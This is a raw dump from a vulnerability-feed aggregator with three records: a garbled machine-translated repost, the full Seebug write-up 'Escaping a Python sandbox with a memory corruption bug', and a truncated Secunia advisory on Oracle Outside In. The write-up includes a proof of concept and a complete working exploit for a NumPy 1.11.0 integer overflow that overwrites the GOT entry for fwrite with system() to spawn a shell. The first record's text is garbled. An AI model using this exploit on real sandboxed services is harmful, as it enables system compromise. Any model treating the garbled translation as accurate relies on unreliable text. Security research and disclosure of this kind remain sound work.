net v 1.60 T=2.42 s (196.7 files/s, 193345.0 lines/s) \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014Language files blank comment code\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 C 68 36146 70025 170992Python 311 27718 57961 87081C/C++ Header 82 1778 2887 7847Cython 1 947 2556 1627Fortran 90 10 52 12 136Fortran 77 3 2 1 83make 1 15 19 62 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 SUM: 476 66658 133461 267828 \nNearly 20 million lines of C code. And here there are some bugs. In the rest of this article, I first describe the cause of this vulnerability conditions. Next, I discuss some of the use the developer should be aware of the CPython runtime behavior, and then I will gradually understand the actual vulnerabilities. Finally, I will consider the quantization in the Python application of the memory corruption issues of risk. \nThe Vulnerability \nI will be by the vulnerability is Numpy v1. 11. 0 perhaps is the old version of the integer overflow error. Since v1. 12. 0 since the problem has been solved, but did not release the Security Advisory. The vulnerability resides in the means for adjusting the Numpy multidimensional array of class object, ndarray and friends API. Call resize call to define the array shape tuple, wherein the tuple of each element is the dimension size. \n$ python \n>>> import numpy as np \n>>> arr = np. ndarray((2, 2), \u2018int32\u2019) \n>>> arr. resize((2, 3)) \n>>> arrarray([[-895628408, 32603, -895628408],[ 32603, 0, 0]], dtype=int32) \nSidenote: well, the array is leaking uninitialized memory, but we will not focus on this post. 
\nIn coverage, the resize actually realloc the buffer, and its size is calculated as the shape of the tuple and the element size of each element of the product. So in the previous code fragment, arr. resize((2, 3))boils down to C code realloc(buffer, 2 * 3 * sizeof(int32))\u3002 The next code fragment is the C in the resize implementation. \nNPY_NO_EXPORT PyObject * \nPyArray_Resize(PyArrayObject *self, PyArray_Dims *newshape, int refcheck, \nNPY_ORDER order) \n{ \n// npy_intp is `long long` \nnpy_intp* new_dimensions = newshape->ptr; \nnpy_intp newsize = 1; \nint new_nd = newshape->len; \nint k; \n// NPY_MAX_INTP is MAX_LONGLONG (0x7fffffffffffffff) \nnpy_intp largest = NPY_MAX_INTP / PyArray_DESCR(self)->elsize; \nfor(k = 0; k \nnewsize *= new_dimensions[k]; \nif (newsize largest) { \nreturn PyErr_NoMemory(); \n\n\n**[1] [[2]](<85015_2.htm>) [[3]](<85015_3.htm>) [[4]](<85015_4.htm>) [[5]](<85015_5.htm>) [[6]](<85015_6.htm>) [next](<85015_2.htm>)**\n", "modified": "2017-04-07T00:00:00", "published": "2017-04-07T00:00:00", "id": "MYHACK58:62201785015", "href": "http://www.myhack58.com/Article/html/3/62/2017/85015.htm", "title": "Using the memory corruption vulnerability in the Python sandbox escape-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T12:00:32", "description": "A few weeks ago I decided to scratch an itch I\u2019ve been having for a while\u200a\u2014\u200ato participate in some bug bounty programs. Perhaps the most daunting task of the bug bounty game is to pick a program which yields the highest return on investment. Soon though, I stumbled upon a web application that executes user-submitted code in a Python sandbox. This looked interesting so I decided to pursue it.\r\n\r\nAfter a bit of poking around, I discovered how to break out of the sandbox with some hacks at the Python layer. Report filed. 
Bugs fixed, and a nice reward to boot, all within a couple days. Sweet! A great start to my bug bounty adventures. But this post isn\u2019t about that report. All in all, the issues I discovered are not that interesting from a technical perspective. And it turns out the issues were only present because of a regression.\r\n\r\nBut I wasn\u2019t convinced that securing a Python sandbox would be so easy. Without going into too much detail, the sandbox uses a combination of OS-level isolation and a locked-down Python interpreter. The Python environment uses a custom whitelisting/blacklisting scheme to prevent access to unblessed builtins, modules, functions, etc. The OS-based isolation offers some extra protection, but it is antiquated by today\u2019s standards. Breaking out of the locked-down Python interpreter is not a 100% win, but it puts the attacker dangerously close to being able to compromise the entire system.\r\n\r\nSo I returned to the application and prodded some more. No luck. This is indeed a tough cookie. But then I had a thought\u200a\u2014\u200aPython modules are often just thin wrappers of mountainous C codebases. Surely there are gaggles of memory corruption vulns waiting to be found. Exploiting a memory corruption bug would let me break out of the restricted Python environment.\r\n\r\nWhere to begin? I know the set of Python modules which are whitelisted for importation within the sandbox. Perhaps I should run a distributed network of AFL fuzzers? Or a symbolic execution engine? Or maybe I should scan them with a state of the art static analysis tool? Sure, I could have done any of those things. Or I could have just queried the some bug trackers.\r\n\r\n\r\n\r\n\r\n\r\nTurns out I did not have this hindsight when beginning the hunt, but it did not matter much. My intuition led me to discovering an exploitable memory corruption vulnerability in one of the sandboxes\u2019 whitelisted modules via manual code review and testing. 
The bug is in Numpy, a foundational library for scientific computing\u200a\u2014\u200athe core of many popular packages, including scipy and pandas. To get a rough idea of Numpy\u2019s potential as a source of memory corruption bugs, let\u2019s check out the lines-of-code counts.\r\n\r\n```\r\n$ cloc *\r\n 520 text files.\r\n 516 unique files. \r\n 43 files ignored.\r\nhttp://cloc.sourceforge.net v 1.60 T=2.42 s (196.7 files/s, 193345.0 lines/s)\r\n \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014\r\nLanguage files blank comment code\r\n \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \r\nC 68 36146 70025 170992\r\nPython 311 27718 57961 87081\r\nC/C++ Header 82 1778 2887 7847\r\nCython 1 947 2556 1627\r\nFortran 90 10 52 12 136\r\nFortran 77 3 2 1 83\r\nmake 1 15 19 62\r\n \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \r\nSUM: 476 66658 133461 267828\r\n```\r\n\r\nIn the remainder of this post, I first describe the conditions which lead to the vulnerability. Next, I discuss some quirks of the CPython runtime which exploit developers should be aware of, and then I walk through the actual exploit. Finally, I wrap up with thoughts on quantifying the risk of memory corruption issues in Python applications.\r\n\r\n### The Vulnerability\r\nThe vulnerability which I am going to walk through is an integer overflow bug in Numpy v1.11.0 (and probably older versions). The issue has been fixed since v1.12.0, but there was no security advisory issued.\r\n\r\nThe vulnerability resides in the API for resizing Numpy\u2019s multidimensional array-like objects, ndarray and friends. 
resize is called with a tuple defining the array\u2019s shape, where each element of the tuple is the size of a dimension.\r\n\r\n```\r\n$ python\r\n>>> import numpy as np\r\n>>> arr = np.ndarray((2, 2), 'int32')\r\n>>> arr.resize((2, 3))\r\n>>> arr\r\narray([[-895628408, 32603, -895628408],\r\n[ 32603, 0, 0]], dtype=int32)\r\n```\r\n\r\nUnder the covers, `resize` actually `realloc`'s a buffer, with the size calculated as the product of each element in the shape tuple and the element size. So in the prior snippet of code, `arr.resize((2, 3))` boils down to C code `realloc(buffer, 2 * 3 * sizeof(int32))`. The next code snippet is the heavily paraphrased implementation of `resize` in C.\r\n\r\n```c\r\nNPY_NO_EXPORT PyObject *\r\nPyArray_Resize(PyArrayObject *self, PyArray_Dims *newshape, int refcheck,\r\n NPY_ORDER order)\r\n{\r\n // npy_intp is `long long`\r\n npy_intp* new_dimensions = newshape->ptr;\r\n npy_intp newsize = 1;\r\n int new_nd = newshape->len;\r\n int k;\r\n // NPY_MAX_INTP is MAX_LONGLONG (0x7fffffffffffffff)\r\n npy_intp largest = NPY_MAX_INTP / PyArray_DESCR(self)->elsize;\r\n for(k = 0; k < new_nd; k++) {\r\n newsize *= new_dimensions[k];\r\n if (newsize <= 0 || newsize > largest) {\r\n return PyErr_NoMemory();\r\n }\r\n }\r\n if (newsize == 0) {\r\n sd = PyArray_DESCR(self)->elsize;\r\n }\r\n else {\r\n sd = newsize*PyArray_DESCR(self)->elsize;\r\n }\r\n /* Reallocate space if needed */\r\n new_data = realloc(PyArray_DATA(self), sd);\r\n if (new_data == NULL) {\r\n PyErr_SetString(PyExc_MemoryError,\r\n \"cannot allocate memory for array\");\r\n return NULL;\r\n }\r\n ((PyArrayObject_fields *)self)->data = new_data;\r\n```\r\n\r\nSpot the vulnerability? You can see inside the for-loop (line 13) that each dimension is multiplied to produce the new size. Later on (line 25) the product of the new size and the element size is passed as the size to `realloc` memory which holds the array. 
There is some validation on the new size prior to `realloc`, but it does not check for integer overflow, meaning that very large dimensions can result in an array which is allocated with insufficient size. **Ultimately, this gives the attacker a powerful exploit primitive: the ability to read or write arbitrary memory by indexing from an array with overflown size.**\r\n\r\nLet\u2019s develop a quick proof of concept that proves the bug exists.\r\n\r\n```\r\n$ cat poc.py\r\nimport numpy as np\r\narr = np.array('A'*0x100)\r\narr.resize(0x1000, 0x100000000000001)\r\nprint \"bytes allocated for entire array: \" + hex(arr.nbytes) \r\nprint \"max # of elemenets for inner array: \" + hex(arr[0].size)\r\nprint \"size of each element in inner array: \" + hex(arr[0].itemsize) \r\narr[0][10000000000]\r\n$ python poc.py\r\nbytes allocated for entire array: 0x100000\r\nmax # of elemenets for inner array: 0x100000000000001\r\nsize of each element in inner array: 0x100\r\n[1] 2517 segmentation fault (core dumped) python poc.py\r\n$ gdb `which python` core\r\n...\r\nProgram terminated with signal SIGSEGV, Segmentation fault.\r\n(gdb) bt\r\n#0 0x00007f20a5b044f0 in PyArray_Scalar (data=0x8174ae95f010, descr=0x7f20a2fb5870, \r\n base=<numpy.ndarray at remote 0x7f20a7870a80>) at numpy/core/src/multiarray/scalarapi.c:651\r\n#1 0x00007f20a5add45c in array_subscript (self=0x7f20a7870a80, op=<optimized out>)\r\n at numpy/core/src/multiarray/mapping.c:1619\r\n#2 0x00000000004ca345 in PyEval_EvalFrameEx () at ../Python/ceval.c:1539\u2026\r\n(gdb) x/i $pc\r\n=> 0x7f20a5b044f0 <PyArray_Scalar+480>: cmpb $0x0,(%rcx)\r\n(gdb) x/g $rcx\r\n0x8174ae95f10f: Cannot access memory at address 0x8174ae95f10f\r\n```\r\n\r\n### Quirks of the CPython runtime\r\nBefore we walk through developing the exploit, I would like to discuss some ways in which the CPython runtime eases exploitation, but also ways in which it can frustrate the exploit developer. 
Feel free to skip this section if you want to dive straight into the exploit.\r\n\r\n#### Leaking memory addresses\r\nTypically one of the first hurdles exploits must deal with is to defeat address-space layout randomization (ASLR). Fortunately for attackers, Python makes this easy. The builtin `id` function returns the memory address of an object, or more precisely the address of the PyObject structure which encapsulates the object.\r\n\r\n```\r\n$ gdb -q --args /usr/bin/python2.7\r\n (gdb) run -i\r\n \u2026\r\n >>> a = 'A'*0x100\r\n >>> b = 'B'*0x100000\r\n >>> import numpy as np\r\n >>> c = np.ndarray((10, 10))\r\n >>> hex(id(a))\r\n '0x7ffff7f65848'\r\n >>> hex(id(b))\r\n '0xa52cd0'\r\n >>> hex(id(c))\r\n '0x7ffff7e777b0'\r\n```\r\n\r\nIn real-world applications, developers should make sure not to expose `id(object)` to users. In a sandboxed environment, there is not much you can do about this behavior, except perhaps blacklisting `id` or re-implementing `id` to return a hash.\r\n\r\n#### Understand memory allocation behavior\r\nUnderstanding your allocator is critical for writing exploits. Python has different allocation strategies based on object type and size. Let\u2019s check out where our big string `0xa52cd0`, little string `0x7ffff7f65848`, and numpy array `0x7ffff7e777b0` landed.\r\n\r\n```\r\n$ cat /proc/`pgrep python`/maps \r\n00400000-006ea000 r-xp 00000000 08:01 2712 /usr/bin/python2.7\r\n008e9000-008eb000 r--p 002e9000 08:01 2712 /usr/bin/python2.7\r\n008eb000-00962000 rw-p 002eb000 08:01 2712 /usr/bin/python2.7\r\n00962000-00fa8000 rw-p 00000000 00:00 0 [heap] # big string\r\n...\r\n7ffff7e1d000-7ffff7edd000 rw-p 00000000 00:00 0 # numpy array\r\n...\r\n7ffff7f0e000-7ffff7fd3000 rw-p 00000000 00:00 0 # small string\r\n```\r\n\r\nBig string is in the regular heap. 
Small string and numpy array are in separate mmap\u2019d regions.\r\n\r\n#### Python object structure\r\nLeaking and corrupting Python object metadata can be quite powerful, so it\u2019s useful to understand how Python objects are represented. Under the covers, Python objects all derive from PyObject, a structure which contains a reference count and a descriptor of the object\u2019s actual type. Of note, the type descriptor contains many fields, including function pointers which could be useful to read or overwrite.\r\n\r\nLet\u2019s inspect the small string we created in the section just prior.\r\n\r\n```\r\n(gdb) print *(PyObject *)0x7ffff7f65848\r\n$2 = {ob_refcnt = 1, ob_type = 0x9070a0 <PyString_Type>}\r\n(gdb) print *(PyStringObject *)0x7ffff7f65848\r\n$3 = {ob_refcnt = 1, ob_type = 0x9070a0 <PyString_Type>, ob_size = 256, ob_shash = -1, ob_sstate = 0, ob_sval = \u201cA\u201d}\r\n(gdb) x/s ((PyStringObject *)0x7ffff7f65848)->ob_sval\r\n0x7ffff7f6586c: \u2018A\u2019 <repeats 200 times>...\r\n(gdb) ptype PyString_Type \r\ntype = struct _typeobject {\r\n Py_ssize_t ob_refcnt;\r\n struct _typeobject *ob_type;\r\n Py_ssize_t ob_size;\r\n const char *tp_name;\r\n Py_ssize_t tp_basicsize;\r\n Py_ssize_t tp_itemsize;\r\n destructor tp_dealloc;\r\n printfunc tp_print;\r\n getattrfunc tp_getattr;\r\n setattrfunc tp_setattr;\r\n cmpfunc tp_compare;\r\n reprfunc tp_repr;\r\n PyNumberMethods *tp_as_number;\r\n PySequenceMethods *tp_as_sequence;\r\n PyMappingMethods *tp_as_mapping;\r\n hashfunc tp_hash;\r\n ternaryfunc tp_call;\r\n reprfunc tp_str;\r\n getattrofunc tp_getattro;\r\n setattrofunc tp_setattro;\r\n PyBufferProcs *tp_as_buffer;\r\n long tp_flags;\r\n const char *tp_doc;\r\n traverseproc tp_traverse;\r\n inquiry tp_clear;\r\n richcmpfunc tp_richcompare;\r\n Py_ssize_t tp_weaklistoffset;\r\n getiterfunc tp_iter;\r\n iternextfunc tp_iternext;\r\n struct PyMethodDef *tp_methods;\r\n struct PyMemberDef *tp_members;\r\n struct PyGetSetDef *tp_getset;\r\n struct 
_typeobject *tp_base;\r\n PyObject *tp_dict;\r\n descrgetfunc tp_descr_get;\r\n descrsetfunc tp_descr_set;\r\n Py_ssize_t tp_dictoffset;\r\n initproc tp_init;\r\n allocfunc tp_alloc;\r\n newfunc tp_new;\r\n freefunc tp_free;\r\n inquiry tp_is_gc;\r\n PyObject *tp_bases;\r\n PyObject *tp_mro;\r\n PyObject *tp_cache;\r\n PyObject *tp_subclasses;\r\n PyObject *tp_weaklist;\r\n destructor tp_del;\r\n unsigned int tp_version_tag;\r\n}\r\n```\r\n\r\n#### Shellcode like it\u2019s 1999\r\nThe ctypes library serves as a bridge between Python and C code. It provides C compatible data types, and allows calling functions in DLLs or shared libraries. Many modules which have C bindings or require calling into shared libraries require importing ctypes.\r\n\r\nI noticed that importing ctypes results in the mapping of a 4K-sized memory region set with read/write/execute permissions. If it wasn\u2019t already obvious, this means that attackers do not even need to write a ROP chain. Exploiting a bug is as simple as pointing the instruction pointer at your shellcode, granted you have already located the RWX region.\r\n\r\nTest it for yourself!\r\n\r\n```\r\n$ cat foo.py\r\nimport ctypes\r\nwhile True:\r\n pass\r\n$ python foo.py\r\n^Z\r\n[2] + 30567 suspended python foo.py\r\n$ grep rwx /proc/30567/maps\r\n7fcb806d5000\u20137fcb806d6000 rwxp 00000000 00:00 0\r\n```\r\n\r\nInvestigating further, I discovered that [libffi\u2019s closure API](http://www.chiark.greenend.org.uk/doc/libffi-dev/html/The-Closure-API.html) is [responsible](https://github.com/libffi/libffi/blob/master/src/closures.c#L762) for `mmap`ing the RWX region. However, the region cannot be allocated RWX on certain platforms, such as systems with selinux enforced or PAX mprotect enabled, and there is code which works around this limitation.\r\n\r\nI did not spend much time trying to reliably locate the RWX mapping, but in theory it should be possible if you have an arbitrary-read exploit primitive. 
While ASLR is applied to libraries, the dynamic linker maps the regions of the library in a predictable order. A library\u2019s regions include its globals which are private to the library and the code itself. Libffi stores a reference to the RWX region as a global. If for example you find a pointer to a libffi function on the heap, then you could precalculate the address of the RWX-region pointer as an offset from the address of the libffi function pointer. The offset would need to be adjusted for each library version.\r\n\r\n#### De facto exploit mitigations\r\n\r\nI tested out security-related compiler flags for the Python2.7 binary on Ubuntu 14.04.5 and 16.04.1. There are a couple of weaknesses which are quite useful for the attacker:\r\n\r\n* Partial RELRO: The executable\u2019s [GOT section](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html), which contains pointers to library functions dynamically linked into the binary, is writable. Exploits could replace the address of `printf()` with `system()` for example.\r\n* No PIE: The binary is not a Position-Independent Executable, meaning that while the kernel applies ASLR to most memory mappings, the contents of the binary itself are mapped to static addresses. Since the GOT section is part of the binary, no PIE makes it easier for attackers to locate and write to the GOT.\r\n\r\n#### Road blocks\r\nWhile CPython is an environment full of tools for the exploit developer, there are forces which broke many of my exploit attempts and were difficult to debug.\r\n\r\n* The garbage collector, type system, and possibly other unknown forces will break your exploit if you aren\u2019t careful about clobbering object metadata.\r\n* `id()` can be unreliable. For reasons I could not determine, Python appears sometimes to pass a copy of the object while the original object is used.\r\n* The region where objects are allocated is somewhat unpredictable. 
For reasons I could not determine, certain coding patterns led to buffers being allocated in the `brk` heap, while other patterns led to allocation in a python-specific `mmap`\u2018d heap.\r\n\r\n### The exploit\r\nSoon after discovering the numpy integer overflow, I submitted a report to the bug bounty with a proof of concept that hijacked the instruction pointer, but did not inject any code. When I initially submitted I did not realize that the PoC was actually pretty unreliable, and I wasn\u2019t able to test it properly against their servers because validating hijack of the instruction pointer requires access to core dumps or a debugger. The vendor acknowledged the issue\u2019s legitimacy, but they gave a less generous reward than for my first report.\r\n\r\nFair enough!\r\nI\u2019m not really an exploit developer, but I challenged myself to do better. After much trial and error, I eventually wrote an exploit which appears to be reliable. Unfortunately I was never able to test it in the vendor\u2019s sandbox because they updated numpy before I could finish, but it does work when testing locally in a Python interpreter.\r\n\r\nAt a high level, the exploit gains an arbitrary read/write exploit primitive by overflowing the size of a numpy array. The primitive is used to write the address of `system` to `fwrite`'s GOT/PLT entry. Finally, Python\u2019s builtin `print` calls `fwrite` under the covers, so now you can call `print '/bin/sh'` to get a shell, or replace /bin/sh with any command.\r\n\r\nThere is a bit more to it than the high-level explanation, so check out the exploit in full below. I recommend to begin reading from the bottom-up, including comments. 
If you are using a different version of Python, adjust the GOT locations for `fwrite` and `system` before you run it.\r\n\r\n```python\r\nimport numpy as np\r\n\r\n# addr_to_str is a quick and dirty replacement for struct.pack(), needed\r\n# for sandbox environments that block the struct module.\r\ndef addr_to_str(addr):\r\n    addr_str = \"%016x\" % (addr)\r\n    ret = str()\r\n    for i in range(16, 0, -2):\r\n        ret = ret + addr_str[i-2:i].decode('hex')\r\n    return ret\r\n\r\n# read_address and write_address use overflown numpy arrays to search for\r\n# bytearray objects we've sprayed on the heap, represented as a PyByteArray\r\n# structure:\r\n# \r\n# struct PyByteArray {\r\n#     Py_ssize_t ob_refcnt;\r\n#     struct _typeobject *ob_type;\r\n#     Py_ssize_t ob_size;\r\n#     int ob_exports;\r\n#     Py_ssize_t ob_alloc;\r\n#     char *ob_bytes;\r\n# };\r\n# \r\n# Once located, the pointer to actual data `ob_bytes` is overwritten with the\r\n# address that we want to read or write. We then cycle through the list of byte\r\n# arrays until we find the one that has been corrupted. This bytearray is used\r\n# to read or write the desired location. 
Finally, we clean up by setting\r\n# `ob_bytes` back to its original value.\r\ndef find_address(addr, data=None):\r\n    i = 0\r\n    j = -1\r\n    k = 0\r\n\r\n    if data:\r\n        size = 0x102\r\n    else:\r\n        size = 0x103\r\n    for k, arr in enumerate(arrays):\r\n        i = 0\r\n        for i in range(0x2000):  # 0x2000 is a value that happens to work\r\n            # Here we search for the signature of a PyByteArray structure\r\n            j = arr[0][i].find(addr_to_str(0x1))  # ob_refcnt\r\n            if (j < 0 or\r\n                arr[0][i][j+0x10:j+0x18] != addr_to_str(size) or  # ob_size\r\n                arr[0][i][j+0x20:j+0x28] != addr_to_str(size+1)):  # ob_alloc\r\n                continue\r\n            idx_bytes = j+0x28  # ob_bytes\r\n\r\n            # Save an unclobbered copy of the bytearray metadata\r\n            saved_metadata = arrays[k][0][i]\r\n\r\n            # Overwrite the ob_bytes pointer with the provided address\r\n            addr_string = addr_to_str(addr)\r\n            new_metadata = (saved_metadata[0:idx_bytes] +\r\n                            addr_string +\r\n                            saved_metadata[idx_bytes+8:])\r\n            arrays[k][0][i] = new_metadata\r\n\r\n            ret = None\r\n            for bytearray_ in bytearrays:\r\n                try:\r\n                    # We differentiate the signature by size for each\r\n                    # find_address invocation because we don't want to\r\n                    # accidentally clobber the wrong bytearray structure.\r\n                    # We know we've hit the structure we're looking for if\r\n                    # the size matches and its contents do not equal 'XXXXXXXX'\r\n                    if len(bytearray_) == size and bytearray_[0:8] != 'XXXXXXXX':\r\n                        if data:\r\n                            bytearray_[0:8] = data  # write memory\r\n                        else:\r\n                            ret = bytearray_[0:8]  # read memory\r\n\r\n                        # restore the original PyByteArray->ob_bytes\r\n                        arrays[k][0][i] = saved_metadata\r\n                        return ret\r\n                except:\r\n                    pass\r\n    raise Exception(\"Failed to find address %x\" % addr)\r\n\r\ndef read_address(addr):\r\n    return find_address(addr)\r\n\r\ndef write_address(addr, data):\r\n    find_address(addr, data)\r\n\r\n\r\n# The address of GOT/PLT entries for system() and fwrite() are hardcoded. 
These\r\n# addresses are static for a given Python binary when compiled without -fPIE.\r\n# You can obtain them yourself with the following command:\r\n# `readelf -a /path/to/python/ | grep -E '(system|fwrite)'`\r\nSYSTEM = 0x8eb278\r\nFWRITE = 0x8eb810\r\n\r\n# Spray the heap with some bytearrays and overflown numpy arrays.\r\narrays = []\r\nbytearrays = []\r\nfor i in range(100):\r\n    arrays.append(np.array('A'*0x100))\r\n    arrays[-1].resize(0x1000, 0x100000000000001)\r\n    bytearrays.append(bytearray('X'*0x102))\r\n    bytearrays.append(bytearray('X'*0x103))\r\n\r\n# Read the address of system() and write it to fwrite()'s PLT entry. \r\ndata = read_address(SYSTEM)\r\nwrite_address(FWRITE, data)\r\n\r\n# print() will now call system() with whatever string you pass\r\nprint \"PS1='[HACKED] $ ' /bin/sh\"\r\n```\r\n\r\nRunning the exploit gives you a \u201chacked\u201d shell.\r\n\r\n```\r\n$ virtualenv .venv\r\nRunning virtualenv with interpreter /usr/bin/python2\r\nNew python executable in /home/gabe/Downloads/numpy-exploit/.venv/bin/python2\r\nAlso creating executable in /home/gabe/Downloads/numpy-exploit/.venv/bin/python\r\nInstalling setuptools, pkg_resources, pip, wheel...done.\r\n$ source .venv/bin/activate\r\n(.venv) $ pip install numpy==1.11.0\r\nCollecting numpy==1.11.0\r\n Using cached numpy-1.11.0-cp27-cp27mu-manylinux1_x86_64.whl\r\nInstalling collected packages: numpy\r\nSuccessfully installed numpy-1.11.0\r\n(.venv) $ python --version\r\nPython 2.7.12\r\n(.venv) $ python numpy_exploit.py \r\n[HACKED] $ \r\n```\r\n\r\n### Quantifying the risk\r\nIt is well known that much of Python\u2019s core and many third-party modules are thin wrappers of C code. Perhaps less recognized is the fact that memory corruption bugs are reported in popular Python modules all the time without so much as a CVE, a security advisory, or even a mention of security fixes in release notes.\r\n\r\nSo yes, there are a lot of memory corruption bugs in Python modules. 
Surely not all of them are exploitable, but you have to start somewhere. To reason about the risk posed by memory corruption bugs, I find it helpful to frame the conversation in terms of two discrete use-cases: regular Python applications, and sandboxing untrusted code.\r\n\r\n#### Regular applications\r\nThe types of applications we\u2019re concerned with are those having a meaningful attack surface. Think web applications and other network-facing services, client applications which process untrusted content, privileged system services, etc. Many of these applications import Python modules built against mountains of C code from projects which do not treat their memory corruption bugs as security issues. The pure thought of this may keep some security professionals up at night, but in reality the risk is typically downplayed or ignored. I suspect there are a few reasons:\r\n\r\n* The difficulty to remotely identify and exploit memory corruption issues is quite high, especially for closed-source and remote applications.\r\n* The likelihood that an application exposes a path for untrusted input to reach a vulnerable function is probably quite low.\r\n* Awareness is low because memory corruption bugs in Python modules are not typically tracked as security issues.\r\n\r\nSo fair enough, the likelihood of getting compromised due to a buffer overflow in some random Python module is probably quite low. But then again, memory corruption flaws can be extremely damaging when they do happen. Sometimes it doesn\u2019t even take anyone to explicitly exploit them to cause harm (re: cloudbleed). To make matters worse, it\u2019s nigh impossible to keep libraries patched when library maintainers do not think about memory corruption issues in terms of security.\r\n\r\nIf you develop a major Python application, I suggest you at least take an inventory of the Python modules being used. 
Try to find out how much C code your modules are reliant upon, and analyze the potential for exposure of native code to the edge of your application.\r\n\r\n#### Sandboxing\r\n\r\nThere are a number of services out there that allow users to run untrusted Python code within a sandbox. OS-level sandboxing features, such as linux namespaces and seccomp, have only become popular relatively recently in the form of Docker, LXC, etc. Weaker sandboxing techniques can unfortunately still be found in use today\u200a\u2014\u200aat the OS layer in the form of chroot jails, or worse, sandboxing can be done entirely in Python (see [pypy-sandbox](http://doc.pypy.org/en/latest/sandbox.html) and [pysandbox](https://github.com/haypo/pysandbox)).\r\n\r\nMemory corruption bugs completely break sandboxing which is not enforced by the OS. The ability to execute a subset of Python code makes exploitation far more feasible than in regular applications. Even pypy-sandbox, which claims to be secure because of its two-process model which virtualizes system calls, can be broken by a buffer overflow.\r\n\r\nIf you want to run untrusted code of any kind, invest the effort in building a secure OS and network architecture to sandbox it.", "published": "2017-03-29T00:00:00", "type": "seebug", "title": "Escaping a Python sandbox with a memory corruption bug", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-03-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92847", "id": "SSV:92847", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow 
Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. 
Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they would check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia was acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important 
